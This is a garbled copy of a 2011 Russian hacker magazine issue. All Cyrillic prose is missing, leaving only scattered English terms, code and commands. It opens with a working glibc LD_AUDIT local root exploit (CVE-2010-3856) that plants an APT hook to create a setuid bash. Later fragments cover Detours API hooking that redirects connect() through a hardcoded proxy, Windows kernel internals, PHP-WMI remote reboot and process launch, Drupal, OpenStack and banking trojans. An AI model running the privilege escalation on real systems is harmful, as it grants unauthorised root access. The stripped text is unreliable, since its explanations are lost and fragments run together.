. ,
: ,
, , .
glibc,
, ldd. (CVE-2010-3847)
root.
, glibc
ELF.
, suid-, , , - suid.
(
). , glibc
, , . Fedora ( RHEL/CentOS),
. Debian Ubuntu
- eglibc.

, , (, /home /tmp), nosuid. glibc ,
: CVE-2010-3856.
, ,
. ( LD_AUDIT)
suid-. , suid-, , ,
suid-, :
$ ls -l /bin/ping
-rwsr-xr-x 1 root root 34716 2010-07-28 14:44 /bin/ping

libpcprofile. Debian/Ubuntu libc, RHEL/Fedora libc-utils.
, EUID UID.
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-09-11 00:32 /lib/
libpcprofile.so
X 02 (145) 2011
Ubuntu
umask,
666: umask 0. , :
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/
apt/apt.conf.d/666exploit" /bin/ping
,
/etc/apt/apt.conf.d, :
$ ls -l /etc/apt/apt.conf.d/666exploit
-rw-rw-rw- 1 root adept 4 2010-12-04 01:03 /etc/apt/apt.
conf.d/666exploit
/etc/apt/apt.
conf.d/666exploit .
,
. apt.conf.d?
, cron,
vixie-cron
644, BAD FILE
MODE. rc- ,
, .
, , - , :
$ echo "APT::Update::Pre-Invoke { \"cp /bin/bash /tmp/
exploit && chmod u+s /tmp/exploit\"; };" > /etc/apt/apt.
conf.d/666exploit
apt-get update
/tmp/exploit. , . , , :
$ /tmp/exploit p
exploit-4.1# whoami
root
RedHat (
glibc), , suid- . suid-
,
capabilities.
Fedora 15.
,
, . .
, -, ,
.
: , avahi-daemon
. , ,
. ,
IPv6 , ( IPv6
X 02 (145) 2011
).
(, , etc).
-,
: mail , RSS (,
securityfocus.com) .
-, . ( , ,
, highload production- ).
Debian ( )
unattended-upgrades.
Fedora/CentOS yum-updatesd yum-cron.
, , .
, / SELinux AppArmor

,
- .
: , , grsecurity.
grsecurity PaX, , : ,
readonly.
.
PaX, grsecurity :
(RBAC);
chroot
, ,
chroot;
,
, root
;
/proc
dmesg netstat ;
:
,
.

. :
PaX ( );
,
;
/proc,
(,
grsecurity);
;
, 32-
64-.
.
Roadmap KernelHardening https://wiki.ubuntu.com.
,
. z
095
CODING
RankoR ax-soft.ru
Microsoft Detours

, , API-
? , ?
-
Microsoft? ,
. Microsoft
Detours!
WTF?
Microsoft Detours ,
Microsoft Research (,
), Win32
API-. 64 , .. 10 :). ,
( 64-) ,
(-, , )
. , ,
,
( , - ).
Detours research.microsoft.com.
Program Files\Microsoft Research.
, ,
. VC++
make, , . [,
, .
.]. ! , 2008-
, . , . , Microsoft
, .
, detours . ,
096
2005- ,
, ! , Visual C++ 2005 (
express). 2010- , - ,
Visual C++ 2005/2008 (,
).
detours detours.h,
detoured.lib, detours.lib detoured.dll.
SOCKS4
, Microsoft Detours,
.
, [, !
..] DLL, cool_call(), ,
,
API-, jump
. ,
, , ,
connect(), , Go To Disassembly, :
X 02 (145) 2011
>> coding
INFO
info

HabraHabr.Ru
bobermaniac.
WARNING
warning

API-
<>
00411573
<>
call dword ptr [__imp__connect@12 (4183B0h)]
F10 , F11
:
<>
71A94A07
71A94A09
mov
push
edi,edi
ebp
, mov edi, edi? , , NOP,

, . -
jump .
, Detours. ?
<>
71A94A07
<>
jmp
@ILT+715(_my_connect@12) (100112D0h)
-, NOP jump
connect() =).
,
.
DetourCreateProcessWithDll(), 7
- , , WinAPI
NULL.
LPCTSTR lpApplicationName
;
X 02 (145) 2011
BOOL bInheritHandles
launchera , false;
DWORD dwCreationFlags .
,
CREATE_DEFAULT_ERROR_MODE | CREATE_SUSPENDED;
LPSTARTUPINFOW lpStartupInfo ,
;
LPPROCESS_INFORMATION lpProcessInformation , ;
LPCSTR lpDetouredDllPath detoured.dll;
LPCSTR lpDllName DLL-;
:
bool res = DetourCreateProcessWithDll(
L"F:\\DetoursTest\\Debug\\DetoursTest.exe",
NULL, NULL, NULL, false, dwFlags, NULL, NULL,
&si, &pi, detouredName, dllName, NULL);
, ! ( ) ResumeThread, pi.hThread. , , .
DLL.
connect().
DLL.
097
CODING
,
:
int (WINAPI * real_connect) (SOCKET sock, const
sockaddr *addr, int namelen) = connect;
,
. ,
, !
,
:).
, ?
connect(), , ,
SOCKS-, ,
, . ,
SOCKS-, SOCKS , .
:
DLLEXPORT int WINAPI my_connect(
SOCKET sock, const sockaddr *addr, int namelen)
{
return connectToSocks4(real_connect, real_send,
real_recv, "68.102.100.62", 55465,
(struct sockaddr_in *) addr);
}
connectToSocks4() ,
SOCKS-. ,
send() recv(), .
connect().

, , ( ,
). :
DetourRestoreAfterWith()
;
DetourTransactionBegin() / ;
DetourUpdateThread() /
;
DetourAttach:
DetourAttach(&(PVOID&)real_connect, my_connect);
DetourTransactionCommit().
, , , DetourAttach() DetourDetach().
SOCKS4.
SOCKS-
. :
1 SOCKS, 0x04;
1 ( 0x01,
0x02);
2 ( ,
);
4 IP-, ;
N+1 C- N,
, . N
.
, ,
:
098
1 , ;
1 :
0x5a ,
0x5b fail,
0x5c identd,
0x5d identd .
2 ;
4 .
:
:
0x04 | 0x01 | 0x00 0x50 | 0x42 0x66 0x07 0x63 | 0x00
:
0x00 | 0x5a | 0xXX 0xXX | 0xXX 0xXX 0xXX 0xXX
0xXX (
)
SOCKS-, , .
SOCKS-:
< >
char reply[8];
char packet[9];
packet[0]
packet[1]
packet[2]
packet[3]
packet[4]
packet[5]
packet[6]
=
=
=
=
=
=
=
0x04;
0x01;
r_host->sin_port / 0x100;
r_host->sin_port % 0x100;
r_host->sin_addr.S_un.S_un_b.s_b1;
packet[7] = r_host->sin_addr.S_un.S_un_b.s_b4;
packet[8] = 0x00;
r_send(sock, packet, 9, 0);
memset(reply, 0x00, 9);
int recvd = r_recv(sock, reply, 9, 0);
< >
return sock;
-
connect(),
.
,
.
, API-
, , ,
Microsoft. ,
SOCKS5? ( ,
, ).
, , , , . ,
:).
,
.
, .z
X 02 (145) 2011
>> coding
CODING
stannic.man@gmail.com

WINDOWS

, .
, IDA Pro
, Windows aka WRK,

Windows. , ?

IT-
ring3 ring0 Windows? ! ,
,
, , CreateFile().
. ,
proof of concept ,
,
, (ring3) . -, , , . ,
, ,
/ ( :)) .
X 02 (145) 2011
(ring3) (
). , ,
- ?
, 0-day , . ,
nt!ZwSystemDebugControl Windows. ,
,
ring3-
ring0-. ,
.
iret sysexit.
,
( ring0 usermod ).
099
CODING
, ,
KiServiceExit,
,
Windows :).
WRK .
,
KiExceptionExit Kei386EoiHelper !
KiExceptionExit: .

.

APC ,
APC.
Kei386EoiHelper: (
EXIT_INTERRUPT). APC EXIT_ALL .
, ,
.

,
? , , WRK
, KiExceptionExit Kei386EoiHelper
. , ,
,
EXIT_ALL :
NtQueryIntervalProfile
HTTP://WWW
links

MSDN ,

,

.
100
, .
, , . ( nt!KiServiceExit) .
,
.
, , ,
. ,
,
.
,
ring0-ring3 ( , , ) . ,
,
, ring0-ring3,
.
,
iret/
sysexit, .
:
KiSystemCallExit;
KiSystemCallExit2;
KiServiceExit;
KiServiceExit2;
KiGetTickCount;
Kei386EoiHelper;
KiTrap02, KiTrap06, KiTrap0D;
KiCallbackReturn;
KiServiceExit:
EXIT_ALL
NoRestoreSegs,
NoRestoreVolatile
Kei386EoiHelper:
EXIT_ALL
,,NoPreviousMode/
: ,
KiExceptionExit KiServiceExit,
. \base\
ntos\ke\i386\trap.asm WRK.
EXIT_ALL,
:
NoRestoreSegs, NoRestoreVolatile NoPreviousMode.
NoRestoreSegs ,
DS, ES, GS. NoRestoreVolatile
, , NoPreviousMode
,
PreviousMode ( -)
KTHREAD.
, ? .

(NoRestoreSegs NoRestoreVolatile), , .
,
/
.
,
.
X 02 (145) 2011
>> coding
IOCTLFuzzer Esagelab
NoPreviousMode.
PreviousMode,
. : ,
(,
nt!KiSystemService) : .
.
, Zw*-
,
. SYSENTER/SYSCALL ( INT0xE,
Windows 7) .
, ,
, KiSystemService.
.text:00405FCC
.text:00405FCC
.text:00405FD1
.text:00405FD5
.text:00405FD6
.text:00405FD8
.text:00405FDD
.text:00405FDD
; NTSTATUS __stdcall ZwOpenFile@24

mov
eax, 74h
lea
edx, [esp+0x4]
pushf
push
8
call
KiSystemService
retn
18h
_ZwOpenFile@24 endp
- PreviousMode

.
PreviousMode UserMode,
,
. Microsoft
, .

Kei386EoiHelper ,
.
,
EBP ESP. , ESP (
, ),
EBP.
,
X 02 (145) 2011
RET .
, EBP ESP: MOV EBP, ESP.
:
-, ,

nt!Kei386EoiHelper,
(, ).
EBP, nt!Kei386EoiHelper

. :).
Pro & cons
,
, , . -
(, ,
) .
, , -
. ,
. , ,
, ,
. .
Windows,
,
. , ?
Windows
.
.
. ,
, , .
, , , . , IT-, , .
! z
101
CODING
victorguzy victorguzy@gmail.com
PHP

PHP+WMI
,
.
, ,
, .

RDP .
, ,
(,
,
?).

TCP
. web-,
, , .
, ,
SSL.
web- ( web-) PHP

5.2 (www.denwer.ru).
102
web- ,

.

.
web- A,
(- BIOS ). www,
, (php-)
. WWW
.htaccess .htpasswd (
.htaccess):
<Files .htpasswd>
deny from all
</Files>
AuthType Basic
AuthName Private zone. Only for Administrators!
AuthUserFile a:\home\localhost\www\.htpasswd
require valid-user
X 02 (145) 2011
BIOS ( )
()
.
.htpasswd ( htpasswd.
exe WEB- Apache),
:
wmimin:$apr1$gg1.....$Sip0RHtOvEsQzAkg3Y0
wmioper:$apr1$JxT6./..$XWF94oRqOlKXRKsKrU0

, .
IP-, ,
,
dyndns.com (
, DNS),
(, DLink
ADSL )
(. ).
web-
IP- DMZ-.
,
.
PHP WMI
COM.
WMI ( Windows)
:
Dsprov.dll, Active
Directory (Active Directory provider), Active Directory
WMI;
Ntevt.dll, (Event
Log provider),
;
Wbemperf.dll,
(Perfomance Counter provider)
;
Stdprov.dll, (Registry
provider),
;
Snmpincl.dll, SNMP-
(SNMP provider),
SNMP (Simple Network Management Protocol);
Wmiprov.dll,
(WDM provider),
Windows Driver Model (WDM);
Cimwin32.dll, Win32
(Win32 provider),
, , , , ,
X 02 (145) 2011

, , ,
, , ,
;
Msiprov.dll,
(Windows Installer provider)
.
web-
(, , ),

, ( IP-),

web-.
Win32
.
,
.

BIOS,
( bios.
php). COM-
StdRegProv WMI. $server,

IP-.

$obj = new COM(
'winmgmts:{impersonationLevel=impersonate}//'
.$server.'/root/default:StdRegProv);
$obj->getStringValue(HKLM,$keypath1,
$keyvalue_def,$key);
echo "BIOS release date: ".$key."\r\n";
$obj->getStringValue(HKLM, $keypath2,
$keyvalue_mb_model, $key);
echo "Mainboard model: ".$key ."\r\n";
, COM-
getStringValue HKLM
( ,
define('HKLM',0x80000002);).
:
HTTP://WWW
links

.

PHP5.
103
CODING
dynamic dns
( cpu_info.php),
:
/root/cimv2
Win32_Processor
$obj = new COM (
.$server.'/root/cimv2');
$pc = 0;
CPU ( )
Const
Const
Const
Const
Const
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
=
=
=
=
=
0x80000000
0x80000001
0x80000002
0x80000003
0x80000005
(
):
BIOS release date: 04/30/10
Mainboard manufacturer: Gigabyte Technology Co., Ltd.
Mainboard model: G31M-ES2L
getStringValue StdRegProv, :
GetBinaryValue BINARY;
GetDWORDValue DWORD;
GetExpandedStringValue
EXPANDED STRING;
GetMultiStringValue MULTI
STRING;
CreateKey ;
SetBinaryValue BINARY;
SetDWORDValue DWORD;
SetExpandedStringValue
EXPANDED STRING; SetMultiStringValue
MULTI STRING;
SetStringValue ;
DeleteKey ;
DeleteValue ;
EnumKey ;
EnumValues ;
CheckAccess .
, MSDN.

WMI (/root/cimv2),
Win32_
Processor, Win32_OperatingSystem, Win32_PerfFormattedData_
PerfOS_System, Win32_OperatingSystem, Win32_Process, Win32_
Service. ,
(CPU), CPUID
104
foreach ($obj->instancesof('Win32_Processor') as $mp)

{
echo "Processor (".++$pc.")\r\n";
echo "Name: ".trim( $mp->Name )." @ " .
$mp->CurrentClockSpeed . " MHz\r\n";
echo "CPU Load: ".$mp->LoadPercentage . "%\r\n";
}
COM- , Win32_Processor, :
Processor (1)
Processor Id: BFEBFBFF0001067A
Name: Pentium(R) Dual-Core
CPU E5300 @ 2.60GHz @ 1196 MHz
CPU Load: 18%
CPU Status: OK
CPU Stepping:
CPU Revision: 5898
System Name: GUZY
, /root/WMI MSAcpi_
ThermalZoneTemperature (
cpu_temp.php). CPU
, .
/root/WMI
MSAcpi_ThermalZoneTemperature
$obj = new COM (
.$server.'/root/WMI');
foreach($obj->instancesof (
'MSAcpi_ThermalZoneTemperature') as $mp)
{
echo "<pre>\r\n";
$ctemp=($mp->CurrentTemperature);
echo Current CPU temperature: "
. ( $ctemp 2732)/10 . "C" . "\r\n";
}
.

/root/cimv2 ,
- . , uptime.php. Win32_OperatingSystem Win32_
X 02 (145) 2011
foreach ( $process AS $row )

{
echo "<pre>\r\n";
echo "NAME: " . $row->Name .",
\r\nDISPLAY NAME:".strtolower($row->DisplayName).",
\r\nPATH: " . strtolower($row->PathName ). ",
\r\nSTATE: " . strtolower($row->state )." ";
}

:
PerfFormattedData_PerfOS_System. uptime format_time($temp),
human_second.php.
OS uptime
foreach($obj->instancesof
('Win32_OperatingSystem') as $mp )
{
$temp=($mp->Name);
echo "OS name: " .substr($temp,0,-40). "\r\n";
$temp2=($mp->ServicePackMajorVersion);
echo "Service pack: " . $temp2 . "\r\n";
}
foreach ($obj->instancesof
('Win32_PerfFormattedData_PerfOS_System') as $mp)
{
$temp=($mp->SystemUpTime);
echo "System uptime: ".format_time($temp)."\r\n";
}
:
OS name: Microsoft Windows Server 2008 R2 Enterprise
Service pack: 0
System uptime: 23hour 32min 42sec
, PHP WMI
.
( ,
, DNS , ) include.
/root/cimv2 Reboot
Win32_OperatingSystem.
ShutDown.

$obj = new COM(
'winmgmts:{impersonationLevel=impersonate,(Shutdown)}//'
.$server.'/root/cimv2');
foreach($obj->instancesof
('Win32_OperatingSystem') as $mp)
{
echo "<pre>\r\n";
echo "Rebooting immediately\r\n\r\n</pre>";
$ctemp=($mp->Reboot);
}
:

$process = $obj->execquery
("SELECT * FROM Win32_Service");
X 02 (145) 2011

("SELECT * FROM Win32_Process");
if ( $process->count > 0 )
{
foreach ( $process AS $row )
{
echo "<pre>\r\n";
echo "PID: ".$row->processid.",
\r\nPROCESS NAME: ".strtolower( $row->name ).",
\r\nMEMORY USAGE: ".number_format
( $row->workingsetsize )." ";
}
}
StartService
StopService Win32_Service:

("SELECT * FROM Win32_Service Where
Name='$servicesname'");
foreach ($process AS $row)
{
$row->StartService();
echo "Service started!";
}
Create
win32_process:

$obj_win32_process=new COM(
.$server.'/root/cimv2:Win32_Process');
$obj_win32_process->Create($processname,
Null,Null,lngProcessID2);
echo "Process created!";
, WMI-
PHP, web- ,
, , .
PHP WMI
Windows-.
PTR (pointer) ( dns_ptr.php),
/root/MicrosoftDNS
MicrosoftDNS_PTRType. web- - (.
).
, Windows- c php- , ! z
105
SYN/ACK
antonov.igor.khv@gmail.com, http://vr-online.ru
Drupal'
: , . ,
. , , Drupal. ,
,
. ,
. Drupal ,
. ?
Drupal'.
1:
Drupal
Drupal web-,
web-. .
, Drupal
. , ,
, Drupal'
.
Drupal
BrainstormBlogger (brainstormblogger.org) Open Atrium (openatrium.
com). Drupal', . Drupal
,
. Drupal. Rainstorm Blogger

( )
. , , .
, Brainstorm blogger . ,
.
, Open Atrium.
. ,
.
, ,
, .
, ( )
Open Atrium.
, .
, , , .
:
;
;
;
wiki;
.
106
2: Drupal'

web- Drupal
, .

!
drush (http://drupal.org/project/drush).
drupal'
:
;
/ ;
.
drush
.
.
, Drupal
. ,
,
. , , , ? !
drush. up upc. /
. ,
:
$ ./drush uninstall < >

:
$ ./drush en blog // blog
$ ./drush dis blog // blog
, drush ,
.
? Drush
.
3: OpenID
.
- web-
/
X 02 (145) 2011
. - , OpenID ,
/
. ,
OpenID.
, Drupal , OpenID. ,
OpenID,
, OpenID.
, ( ) Yandex, Rambler, Google, LiveJournal,
VKontakte, Facebook .
(Google, LiveJournal, Facebook) Drupal , .
OpenID-,
.
! -,
OpenID Extension (http://drupal.org/files/issues/openid_ext_1.zip)
. ,
OpenID.
,
ID- .
4: Drupal +
OpenID, , ,

( ) , ? , External Form Login, .
VKontakteID,
.
, . ,
. OpenID- ( VKontakteID),
. ,
, .
- . ,
, , , . , Drupal
. ,
- . X 02 (145) 2011
OpenAPI-. , .
Drupal OpenAPI
VK OpenAPI (http://drupal.org/project/vk_openapi).
,
. VK OpenAPI
Share,
.
5:
PHP Smarty
(www.smarty.net). CMS , . ,
. , Drupal
, smarty. smarty theme engine
Drupal (http://drupal.org/project/smarty) , ,
Smarty ( ). Smarty. , ,
Smarty-,
.
6:
Drupal?
Drupal' . ,
90% : Drupal .
,
. ,

. , .
1. . , (http://drupal.org/documentation/theme).
, . ,
, , Drupal
. -
107
SYN/ACK
Drush

( ).
8:
OpenAtrium
,
Drupal-.
Drupal (http://pcmag.ru/solutions/detail.
php?ID=37518). .
2. Zen. Drupal
.
.
Zen (http://drupal.org/project/zen).
.
7: Shared VPS?
Drupal ,
,
. Drupal
,
. , , web-, , PHP .

. , .
, .

, shared-
- .
VPS,
108
Drupal . Drupal , - ,
. Drupal
:
1. . .

.
2. . Drupal , (, ).
3. .
,
Drupal.
, . (admin/settings/performance)
, . ,
, .
: .
, . .
.
,
.

. CSS JavaScript . ? ,
css/js .

. , , . , .
Drupal css/js,
.
X 02 (145) 2011
9:
,
Drupal
. web-,
PHP. - ,
.
,
PHP.
Drupal PHP,
.
PHP ,
Drupal php_value memory_
limit. ,
, .
, , .
,
32M (
32- ). ,
max_excecution_time
( ).
30 .
,
.
PHP
PHP , ,
.
PHP
,
.
, .
php-
, php-.
-
X 02 (145) 2011
.
- .
eAccelerator
(http://www.eaccelerator.net).
,
.

web- MySQL. , , .
MySQL
, , ( mysql).
10:
.
Drupal , .
. ,
. Drupal
. ,
cacherouter (http://drupal.org/project/
cacherouter). CR
Drupal
memcached
(APC, eAccelerator, XCache). ,
.
11: Views
- Drupal. sql-.
: , .
,
. Views (http://drupal.org/project/views).
, ,
, . .
, ,
.
.
HTTP://WWW
links
drupal.org
Drupal:

CMF,
,
;
www.drupal.ru

Drupal:
,
Drupal
. ,
,
,

;
http://contentmanagementsystems.info/

Drupal: ,
FAQ, CMF
Drupal;
vr-online.ru

, .

, Drupal. ,
, .
109
SYN/ACK
Drupal
12: Drupal.API
, API SQL
. , ,
. . Drupal.API. , ,
. ,
,
.
, , ,
.
13:
. , ,
, .

. http://loadimpact.
com. web-
. .
pro-. , , ,
, . :
, . , ,
.
14:

, web- Apache. ,
. Apache Drupal

.
, .
, .
? nginx (http://sysoev.ru/nginx)! -
110
nginx, , web-. Apache

(
, nginx ).
(http://vr-online.ru) Apache nginx. : ,
. Apache .
15: nginx
Nginx Drupal' ,
, .
. ,
. - ,
(https://github.com/yhager/nginx_drupal) nginx,
Drupal. Drupal
nginx. ,
, :
url;
;
fastcgi;
boost .
16: Drupal 7
,
.
( ) -,
.
,
Drupal'.
Drupal CMS,
. , . .
Drupal . ! ,
, , drupal' .
! z
X 02 (145) 2011
SYN/ACK
zobnin@gmail.com
,

cloud- OpenStack:

syn/ack
Eucalyptus, Ubuntu Enterprise Cloud.
,
NASA, Intel, AMD, Dell .
, ,
, ,
, , , .

, ,
.

, ,
.
.
- , .

Amazon EC2,
IaaS (
,
). EC2

,
, .
, Amazon, , , ,
Amazon,
. ,
IaaS ,
, ,
, . , , ,
, , :
,
.
Eucalyptus Open Source , ,
cloud- IaaS
.
, , , ,
Amazon EC2.
, Eucalyptus ,
112
.
, ,
, .
OpenStack : Cloud Files and Cloud Servers, RockSpace,
Nebula Cloud Platform, NASA.
,
: OpenStack Nova OpenStack Swift.
Nova
OpenStack Nova (Compute), ,

. Nova
:
, ,
, .. Nova NASA
Nebula (http://nebula.nasa.gov/), Python AMQP.
:
(Cloud Controller) ;
API (API Server) web-,
;
(Compute Controller)
;
(Object Store) ,
Amazon S3;
(Auth Manager) ;
(Volume Controller) ;
(Network Controller)
,
;
(Scheduler)
.
,
. API,
, .
nova-manage . , , API
X 02 (145) 2011

SaaS Software as a Service (
).
, .
: gmail.
PaaS Platform as a Service ( ).

.
Java, .
IaaS Infrastructure as a Service (
). , ,

.
Amazon EC2
euca2ool Eucalyptus.

(Object Store). Nova S3-
,
.
Swift, Nova.
,
( ).
.

,
IP-
,
.
, ,
.
,

, ,
(

, , ).

OpenStack,
.

, , , .
, .

:
,
API. API
,
:
, .
IP-
.
,
X 02 (145) 2011
.
, ,
,
. , ,

API . ,
,
,

.
, OpenStack .

HTTP.
. , OpenStack
, , .
Amazon
EC2,
( KVM, UML,
XEN, HyperV qemu).
Swift
Swift (OpenStack Object Storage) , , Amazon S3.

Swift
Rackspace.
:
- (Proxy Server),
;
(Object Server),
;
(Container Server), ;
(Account Server), .
Swift-
,
-,
,
( )
.
HTTP://WWW
links
Nova: http://
nova.openstack.org/
nova.concepts.html;

Nova: http://nova.
openstack.org/
adminguide/index.
htmll;

Nova: http://
wiki.openstack.
org/NovaInstall/
MultipleServer;
Swift: http://
swift.openstack.
org/overview_
architecture.html.
INFO
info
OpenStack
,
,

.
113
SYN/ACK
- ReST-ful API, HTTP.

:
GET http://swift.host.com/v1/account/container/object
account , container , , object

(, , ).
- (rings) .
, , .
, . , .
Swift-. .
, ,
,
(xattr). ,
,
.
, , RAID-.
.
, ,
Swift.
,
(,
), , ,
.
OpenStack , ,
, ,
.
Nova , Swift,
, .
, ,
.
, Nova Swift
,
:
114
Nova
$ sudo apt-get install rabbitmq-server \
redis-server
$ sudo apt-get install nova-api \
nova-objectstore nova-compute \
nova-scheduler nova-network \
euca2ools unzip
, :
$ sudo nova-manage user admin vasya
,
:
$ sudo nova-manage project create \
experiments vasya
, , zip-:
$ sudo nova-manage project zipfile \
experiments vasya
,
EC2- . , novarc:
X 02 (145) 2011
$ unzip nova.zip
$ . novarc
--kernel ID- --ramdisk ID-
5. :
, EC2-
.
Linux- Rackspace:
$ wget http://c2477062.cdn.cloudfiles.rackspacecloud.
com/images.tgz
$ euca-upload-bundle -m /tmp/machine.manifest.xml -b
mybucket
6. :
$ euca-register mybucket/machine.manifest.xml
:
$ tar -xzf images.tgz
,
:
, SSH- :
$ euca-add-keypair mykey > mykey.priv
$ chmod 600 mykey.priv
1. :
:
$ euca-bundle-image -i images/aki-lucid/image \
-p kernel --kernel true
$ euca-bundle-image -i images/ari-lucid/image \
-p ramdisk --ramdisk true
$ euca-run-instances ID- --kernel ID- \

--ramdisk ID- -k mykey
:
2. :
$ euca-upload-bundle -m /tmp/kernel.manifest.xml -b
mybucket
$ euca-upload-bundle -m /tmp/ramdisk.manifest.xml -b
mybucket
3. :
$ euca-register mybucket/kernel.manifest.xml
$ euca-register mybucket/ramdisk.manifest.xml
. .
4. ,
:
$ euca-bundle-image -i images/ami-tiny/image -p machine \
X 02 (145) 2011
$ euca-describe-instances
, :
$ virsh list
SSH:
$ euca-authorize -P tcp -p 22 default
$ ssh -i mykey.priv root@10.0.0.3
:
$ uca-terminate-instances ID-

OpenStack. ,
. ,
, , ,

. z
115
SYN/ACK
, InfoWatch fnn@fnn.ru, infowatch.livejournal.com
,

, . .
, (
, 2, 17). :
, , (, 1, 71).
,
. . ,
.
,
. , .
;

;
, ;
;
;
(c) Copyright All rights reserved ;
;
(-) .
,

: ? !.
.
(, )
/
, . . . 1252
: , ,
... .
, ,
.
,
116
. , , , ( ).
,
.
, , ,
, .
, . ,

14 26 2007 . .

.
:
; -
, .
, . , , , ,
,
? , .
,
. . , , ,
.
. .

.
:
-, ?.
X 02 (145) 2011
, ,
, .
,
, .
. (. 272 )
,
. ,
, ,
.
,
.
. , , - ,
( )
. , ,
,
.
: , ,
.
. .

.
, ,
. .
, , . XXI
,
.
X 02 (145) 2011

. -
, ,
.
, .
, , .
. ,
.
,
,
. ,
, .
-.
.
, . , .
,
. ,
, . ,
0,8% (
),
. . ,
. ,
. .
,
. , ,
.
,
. ,
117
SYN/ACK
.
. , ,
- . .
(. 72 ) (. 70 )
.
(
) - . ,
, : , .
(, ).
,
.
, , ,
. ( , , ,
) .
, ( ). , , ,
, ( ), ,
.

. ,
, , . .
, . ,
, NC
:
,
( , ).
? .
.
. , ,

.
.
.
. , -
.
. : , . ,
.
(c) Copyright All rights

reserved
, , . ,
, , .
,
. - ,
, :
,
.
, .
118

- (. 4 . 1259).
copyright () : . 1271 ,
- .
GPL, BSD, GFDL , . ,

, , . , .
( ) .
, , .

.
.
, , . ,
: , , ,
, . , ,
,
. , , . ,
.
, , , , (. 130 ) ,
,
. ,

, ,
IP-, . ,
.

. . ,
, ,
.
, , , , .
.z
, , . -,
, . ,
: lozovsky@gameland.ru. ,
FAQ, .
. .
X 02 (145) 2011
SYN/ACK
Group-IB, pisemskiy@group-ib.ru

-

.
400 , GroupIB 2010 .
, , .
, ,
.

- -,
.
, : , .
2008 .

, ,
. 2010
76 , 46
. 35
, .
,
,
, .
, ,
, .

: , , .
.
1. .
, ,

, .
(/ )
. Zeus,
.
, -,
iframe- Java-, (Adobe
120
Flash, Adobe Reader, Java ).

,
, . ,
, .

,
.
,
, . - :
/, ,
(, , ).
2.
, .
,
. IP-,
.
( , ,
, ) - IP-

IP-, .

. .

, RDP, VNC, Radmin, TeamViewer.

,
.
Windows,
.
VPN- OpenVPN Hamachi.
.
,
X 02 (145) 2011
- , API Windows.
, , ,
.
, ,
.
:
, , DDoS-
- .
(, NT Loader). ,
, .
3.

, .
.

, ,
. ( 2 )
,
,
. :
.
, ,
.
,
, .

IP-
.
,
.
,
X 02 (145) 2011
:
, ,
, .
, ,
. , 80%

.
,
- -,
.
, .
IP-
: , 1,
, .

.
,
.
,
. ,
,
,
.

.
4
80% .
:
, ( , ,
);
, ;
;
;
DDoS- -;
;
121
SYN/ACK
IP-
.

. ,
,
. -,
, .

,
,
.
,
. -
.
.
.
, , , ,
.
.

1. , .
2. .
3. .
4. :
;
;
;
5.

.
.
.

.
6. . .
7.
, .
122

. ,
. . ,
2 ,
. z

Win32/Spy.Shiz.NAL
;
Terminal Services (RDP);
OpenSSL;
Windows ;
;
;
Crypto API.
:
BS-Client;
iBank;
--/ Faktura;
;
WebMoney;
HandyBank;
;
/ InterBank;
Inter-PRO;
;
;
.
X 02 (145) 2011
UNITS
Ant antitster@gmail.com, Step twitter.com/stepah
faq
united?

faq@real.xakep.ru
Q: ,
,
?
-
.
A:
client-side .
, ,
, .
,

, -
.
:
SurfPatrol (surfpatrol.ru).
(QuickTime, Flash, Adobe Reader,
Silverlight, Java ). -
, SurfPatrol
.
Secunia Online Software Inspector
(secunia.com/vulnerability_scanning/online).

. -
PSI.
124
Panda ActiveScan 2.0 (pandasecurity.com/

homeusers/solutions/activescan). ActiveX-
Panda Security.
Check Your Plugins (mozilla.com/
plugincheck). - Firefox'.
Q: ,

SMS-.

, COM :).
A:
Clickatell Bulk SMS Gateway (clickatell.
com). - ,
SMS
( Fake ID).
SMS-
.
API,

.

(clickatell.com/developers/
clickatell_api.php), ,
PHP.
HTTP API Clickatell:
<?
//
$user = "user";
//
$password = "password";
// API
$api_id = "xxxx";
$baseurl =
"http://api.clickatell.com";
//
$text = urlencode("Hi! This is
alert message. Server id down!");
//
$to = "0123456789";
$url = "$baseurl/http/auth?user
=$user&password=$password&api_
id=$api_id";
$ret = file($url);
$sess = split(":",$ret[0]);
if ($sess[0] == "OK") {
$sess_id = trim($sess[1]);
$url = "$baseurl/http/
X 02 /145/ 2011
sendmsg?session_id=$sess_
id&to=$to&text=$text";
$ret = file($url);
$send = split(":",$ret[0]);
if ($send[0] == "ID")
echo "success message ID: ".
$send[1];
else
echo "send message failed";
} else {
echo "Authentication failure: ".
$ret[0];
exit();
}
?>
,
API- ,
.

HTTP-.
.

(
) .
Q:
.

.
,

? , , ?
,
,
.
A: , ,
.

GNS3 (gns3.
net).
, , , Cisco. ,
, Cisco IOS,
.
Q: Java-? ,
3 .

.
A: ,

JavaScript-. ,
. :
X 02 /145/ 2011
1. :
var iCounter = 0 => i=0
2. :
x=new Array(); => x=[];
while(){}, do {} while () => for()
{}
x=Math.floor(x); => x=x>>0;
x=Math.round(x); => x=x-.5>>0;
x=Math.pow(2,x); => x=1<<x;
x=x/256; => x=x>>8;
3.
:
0x10 => 16
0x20000 => 1<<17
1000 => 1e3
.0001 => 1e-4
4. for-:
for(x=0;x<50;x++){} =>
for(x=50;x;){}
5. , , :
for () { a+=b; c*=a; } => for()
a+=b,c*=a;
function () {a+=b;} => function()
{a+=b}
6.
:
x=document.createElement(
);document.body.appendchild(x);
=> d=document;x=d.createElement(
);d.body.appendchild(x);
y=x*x*x+x*x-4;z=x*x*x+x*x+5; =>
y=(q=x*x*x+x*x)-4;z=q+5;
7. :
x=0;y=0; => x=y=0;
x=0;y=[0]; => y=[x=0];
Q:
JS?
A: JS- .
, JS-

. , 4
for() .
, , ,
. , :
code="o = document.
createElement('a');\r\ndocument.
body.appendChild(o);"

:
keys="A"
code="o = AcreateElement('a');\r\
nAbody.appendChild(o);Adocument.";

document. A.
keys
,
( A).
code ,

.
,

.
:
sub_string=["o = ",
"createElement('a');\r\n", "body.
appendChild(o);", "document."];

, ,
.
,

. , , JsSfx (code.
google.com/p/jssfx).
Q: .
,
,
.
?
A:
BSOD,
.

,

. BlueScreenView (nirsoft.
net), dump-,
,

.
125
UNITS
Q: T9 QWERTY-?
A: ,
Swype (swypeinc.com).

, ,
-.
T9.
Swype .
, .
.
(swypeinc.com) -
Android, ,
.
Q: , SSL.
, -
?
A: , . , , ,
- SSL.
, ,
, .
:
. .
,
, . ,
,

. :
.
